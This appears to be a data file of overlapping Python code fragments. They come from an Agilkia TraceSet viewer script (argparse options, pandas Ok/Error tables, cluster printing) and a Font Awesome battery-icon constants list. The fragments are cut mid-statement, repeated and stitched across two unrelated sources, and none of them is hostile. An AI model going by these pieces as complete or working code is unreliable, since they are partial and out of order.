extra space)", "df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\":", "import agilkia INDENT = \" \" # prefix for each trace (plus one", "coding: utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet. It prints", "will be displayed in clusters, by default. TODO: allow user to specify the", "pd.read_csv(args.eventchars, header=None) # we assume this has just two columns: 0=action_name and 1=char.", "parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\",", "of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of", "if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT,", "help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\")", "an Agilkia TraceSet. It prints a one-line summary of each trace, plus some", "a one-line summary of each trace, plus some general statistics. If the TraceSet", "for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import argparse from", "agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume", "traces within an Agilkia TraceSet. 
It prints a one-line summary of each trace,", "TraceSet DataFrame, creates a table of Actions showing how many got Ok vs", "err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True,", "df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) /", "args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces)", "events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent", "map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats is", "map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated", "else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars", "value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset", "# -*- coding: utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet.", "row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program that", "-*- \"\"\" View the traces within an Agilkia TraceSet. 
It prints a one-line", "of Actions showing how many got Ok vs Error.\"\"\" good = df[df.Status ==", "clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats,", "0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats", "data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return", "if args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters =", "\"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a", "errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\", default=\"0\",", "= df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good,", "\"--status\", help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify", "creates a table of Actions showing how many got Ok vs Error.\"\"\" good", "red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success", "pd import argparse from pathlib import Path import textwrap import agilkia INDENT =", "if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items():", "prints a one-line summary of each trace, plus some general statistics. If the", "of each trace, plus some general statistics. 
If the TraceSet is clustered, traces", "c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] ==", "in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in", "<gh_stars>1-10 # -*- coding: utf-8 -*- \"\"\" View the traces within an Agilkia", "summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as", "csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\"," ]
[ "\"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3", "# 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d \" + FA_BATTERY_LIST[4]", "'\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty", "# empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters", "= [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\",", "\"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY =", "FA_QUESTION = '\\uf128' FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST", "FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\",", "= '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\",", "\"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d \" +", "FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\",", "# 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full", "1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full ]", "# half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d", "'\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", #", "= '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", #", "FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter", "empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\",", "FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half", "\"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", #", "[ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", #", "'\\uf128' FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [", "= '\\uf1e6' FA_BUG = '\\uf188' 
FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", #", "= '\\uf128' FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST =", "quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY", "half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d \"", "'\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1" ]